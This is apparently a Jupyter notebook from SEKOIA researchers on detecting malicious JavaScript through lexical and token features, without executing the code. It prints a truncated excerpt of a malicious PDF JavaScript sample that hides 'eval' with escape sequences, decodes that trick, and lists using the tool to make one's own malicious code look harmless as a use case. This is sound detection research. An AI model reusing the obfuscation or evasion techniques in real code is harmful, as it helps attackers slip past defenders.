In [7]:

    
%matplotlib inline
import jsitbad
data = jsitbad.load_js_files('Javascript/*/*')

Classifying JavaScript fragments as malicious or benign, without executing them

Edouard Klein, Sébastien Larinier, Alexandra Toussaint @ SEKOIA

Use cases

Draw the analyst's attention to suspicious files in a collection
Filter files passing through a proxy
Check that your own malicious code looks harmless (so this tool should not be shared with just anyone)

Challenges

Theoretically impossible in the general case (the problem reduces to the halting problem, so it is undecidable)
Especially when the code cannot be executed (remember that it may be malicious)...
But reading the source still gives a fair idea of what it does.
Minification makes life harder

So it must be feasible in practice.

And it has been attempted before:

Peter Likarish, Eunjin Jung, and Insoon Jo. Obfuscated malicious JavaScript detection using classification techniques. In 4th International Conference on Malicious and Unwanted Software (MALWARE), 2009, pages 47–54. IEEE.

That work is more a detector of unreadable code than a detector of malicious code.



In [8]:

    
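import re

from IPython.display import HTML
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import JavascriptLexer


def pygment_code(code):
    """Render JavaScript source as syntax-highlighted HTML."""
    snippet = highlight(code, JavascriptLexer(), HtmlFormatter(full=True))
    # Prefix the generated CSS selectors and class names with "pygm",
    # presumably so the snippet's styles do not clash with the notebook's CSS.
    snippet_sub = re.sub(r"""(body \.|class=")""", r"""\1pygm""", snippet)
    return HTML(snippet_sub)


def show_file(fname, start, end):
    """Display characters start:end of the loaded file named fname."""
    js = [x['code'] for x in data if x['name'] == fname][0][start:end]
    return pygment_code(js)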



In [10]:

    
show_file('MooTools-Core-1.5.1.js', 1099, 1900)

    Out[10]:

this.MooTools = {
	version: '1.5.1',
	build: '0542c135fdeb7feed7d9917e01447a408f22c876'
};

// typeOf, instanceOf

var typeOf = this.typeOf = function(item){
	if (item == null) return 'null';
	if (item.$family != null) return item.$family();

	if (item.nodeName){
		if (item.nodeType == 1) return 'element';
		if (item.nodeType == 3) return (/\S/).test(item.nodeValue) ? 'textnode' : 'whitespace';
	} else if (typeof item.length == 'number'){
		if ('callee' in item) return 'arguments';
		if ('item' in item) return 'collection';
	}

	return typeof item;
};

var instanceOf = this.instanceOf = function(item, object){
	if (item == null) return false;
	var constructor = item.$constructor || item.constructor;
	while (constructor){
		if (constructor === object) return true;
		constructor = constructor



In [11]:

    
show_file('webix.js', 190, 1000)

    Out[11]:

window.webix||(webix={}),webix.version="2.2.3",webix.codebase="./",webix.name="core",webix.clone=function(t){var e=webix.clone.a;return e.prototype=t,new e},webix.clone.a=function(){},webix.extend=function(t,e,i){if(t.b)return webix.PowerArray.insertAt.call(t.b,e,1),t;for(var s in e)(!t[s]||i)&&(t[s]=e[s]);
return e.defaults&&webix.extend(t.defaults,e.defaults),e.$init&&e.$init.call(t),t},webix.copy=function(t){var e;arguments.length>1?(e=arguments[0],t=arguments[1]):e=webix.isArray(t)?[]:{};for(var i in t)t[i]&&"object"==typeof t[i]&&!webix.isDate(t[i])?(e[i]=webix.isArray(t[i])?[]:{},webix.copy(e[i],t[i])):e[i]=t[i];
return e},webix.single=function(t){var e=null,i=function(){return e||(e=new t({})),e.c&&e.c.apply(e,arguments),e};return i},webix.protoUI=function(){var t=arguments,e=t[0].name,i=func



In [12]:

    
show_file('2cee1e15cde38907aa427da3e2161c4894d62e084b5adac92dcd9636bf8580e8.out', 0, 500)

    Out[12]:

c = []; zzzpages.push(c); this.numPages = zzzpages.length;

//jsunpack End PDF headers
ImageField1=this;
var rawValue = "";

yy=0;
s=null;
try{ImageField1.getDisplayItem({asd:31})}catch(q){if(ImageField1.isPropertySpecified('w')){yy=false?123:2}}
xt="trin\u0067";
x='\u0065\u0049';
xr="\x65";
dd="\u0043\u006f\u0064\u0065";
dde="\u006d\u0043\u0068\u0061\u0072";
s="\u006e\u0074\u0076";
xx=s[2]+"";
xx=xx+"\x61\x6c";
if(yy){function XA(z,a,b){return ZA(a,b)};}
if(yy)XA(0,1,2);
p=z[xr+xx]("S".concat(x
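
The escape sequences in the sample above hide the name of the property that is looked up on `z`. The sketch below decodes three of the sample's literals and repeats the sample's own concatenations to recover that name. `decode_js_escapes` and `JS_LITERALS` are illustrative names, not part of jsitbad, and the decoder only handles the two escape forms that appear in the sample.

```python
import re

# String literals copied from the sample shown above (raw, still escaped).
JS_LITERALS = {
    "xr": r"\x65",
    "s": r"\u006e\u0074\u0076",
    "tail": r"\x61\x6c",
}

# Only \uXXXX and \xXX are handled; other JavaScript escapes are ignored.
_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")


def decode_js_escapes(literal):
    """Replace \\uXXXX and \\xXX escapes with the characters they encode."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


decoded = {name: decode_js_escapes(text) for name, text in JS_LITERALS.items()}

# Mirror the sample: xx = s[2] + ""; xx = xx + "\x61\x6c"; then z[xr + xx](...)
xx = decoded["s"][2] + decoded["tail"]
property_name = decoded["xr"] + xx

raw_source = "".join(JS_LITERALS.values())
print("eval" in raw_source)  # False: the word never appears literally
print(property_name)         # eval
```

A plain text search for `eval` therefore misses this file, which is one reason lexical features are needed rather than keyword matching alone.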



In [13]:

    
X = jsitbad.simple_features([x['code'] for x in data])
X.shape

    Out[13]:

(61, 7)
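
The notebook does not show which seven features `jsitbad.simple_features` computes. As an illustration only, here is a sketch of seven cheap lexical measurements that can be taken without executing the code. Every feature below is an assumption chosen for the example, and `sketch_features` is a hypothetical name.

```python
import math
import re
from collections import Counter


def sketch_features(code):
    """Return seven illustrative lexical features (hypothetical, not jsitbad's)."""
    n = max(len(code), 1)
    lines = code.splitlines() or [""]
    counts = Counter(code)
    # Shannon entropy of the character distribution, in bits per character.
    entropy = -sum((c / n) * math.log2(c / n) for c in counts.values())
    return [
        len(code),                                    # total length
        max(len(line) for line in lines),             # longest line
        sum(ch.isspace() for ch in code) / n,         # whitespace ratio
        len(re.findall(r"\\u[0-9a-fA-F]{4}|\\x[0-9a-fA-F]{2}", code)) / n,  # escape density
        len(re.findall(r"//[^\n]*|/\*.*?\*/", code, flags=re.S)) / len(lines),  # crude comment rate
        len(re.findall(r"\b(?:eval|unescape|fromCharCode)\b", code)),  # suspicious names
        entropy,
    ]


readable = "// add two numbers\nfunction add(a, b) {\n    return a + b;\n}\n"
obfuscated = 'x="\\x65";s="\\u0076";eval(x+s)'

X_sketch = [sketch_features(src) for src in (readable, obfuscated)]
print(len(X_sketch), len(X_sketch[0]))  # 2 7
```

One row per file and one column per feature gives a matrix with the same layout as `X` above.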



In [15]:

    
jsitbad.project_on_plane(X, [x['color'] for x in data])
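
How `project_on_plane` works is not shown here. One common way to put feature vectors on a plane is principal component analysis, sketched below with NumPy on random stand-in data. `pca_project` is a hypothetical helper, and whether jsitbad uses PCA, standardises the columns, or does something else is an assumption.

```python
import numpy as np


def pca_project(X, n_components=2):
    """Project the rows of X onto their first principal components."""
    X = np.asarray(X, dtype=float)
    # Standardise columns so that large-scale features (such as file length)
    # do not dominate; constant columns are left at zero.
    centered = X - X.mean(axis=0)
    scale = X.std(axis=0)
    scale[scale == 0] = 1.0
    Z = centered / scale
    # Rows of Vt are the principal axes, ordered by decreasing variance.
    _, _, Vt = np.linalg.svd(Z, full_matrices=False)
    return Z @ Vt[:n_components].T


rng = np.random.default_rng(0)
X_demo = rng.normal(size=(61, 7))  # stand-in data with the same shape as X
coords = pca_project(X_demo)
print(coords.shape)  # (61, 2)
```

The two columns of `coords` can then be drawn as a scatter plot, with one colour per class taken from `x['color']`.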



In [17]:

    
jsitbad.project_on_plane(X, [x['color'] for x in data], unique='Spectral Embedding', 
                         labels=[x['name'] if x['color']=='g' else '' for x in data])



In [25]:

    
data = jsitbad.load_js_files('hard_js/*')
f = jsitbad.train_from_js_tokens([x['code'] for x in data])
X_tokens = f([x['code'] for x in data])
X_tokens = X_tokens.toarray()
X_tokens.shape

    Out[25]:

(54, 76)
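
`train_from_js_tokens` returns a function that turns sources into a matrix with one column per token feature. Its internals are not shown, so the sketch below only illustrates the general pattern: fit a vocabulary of token types once, then return a closure that counts them. The regex tokenizer, its six token classes, and the name `train_token_counter` are all assumptions for the example; a real JavaScript lexer distinguishes many more token types.

```python
import re
from collections import Counter

# Crude, hypothetical token classes; regex literals and templates are not handled.
TOKEN_SPEC = [
    ("comment", r"//[^\n]*|/\*.*?\*/"),
    ("string", r"\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*'"),
    ("number", r"\d+(?:\.\d+)?"),
    ("keyword", r"\b(?:var|function|return|if|else|for|while|try|catch|new)\b"),
    ("name", r"[A-Za-z_$][\w$]*"),
    ("punct", r"[^\s\w]"),
]
TOKEN_RE = re.compile("|".join(f"(?P<{n}>{p})" for n, p in TOKEN_SPEC), re.S)


def token_types(code):
    """Return the sequence of token class names found in code."""
    return [m.lastgroup for m in TOKEN_RE.finditer(code)]


def train_token_counter(sources):
    """Fit a vocabulary on sources; return a function mapping sources to count rows."""
    vocabulary = sorted({t for code in sources for t in token_types(code)})

    def transform(new_sources):
        rows = []
        for code in new_sources:
            counts = Counter(token_types(code))
            rows.append([counts[t] for t in vocabulary])
        return rows

    transform.vocabulary = vocabulary
    return transform


sources = ['var x = "a";', 'f(1, 2); // call']
g = train_token_counter(sources)
print(g.vocabulary)
print(g(sources))
```

Because the vocabulary is fixed at training time, the returned function produces rows of the same width for files it has never seen, which is what a downstream classifier or projection needs.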



In [26]:

    
jsitbad.project_on_plane(X_tokens, [x['color'] for x in data])



In [27]:

    
jsitbad.project_on_plane(X_tokens, [x['color'] for x in data], unique='LLE', 
                         labels=[x['name'] if x['color']=='g' else '' for x in data])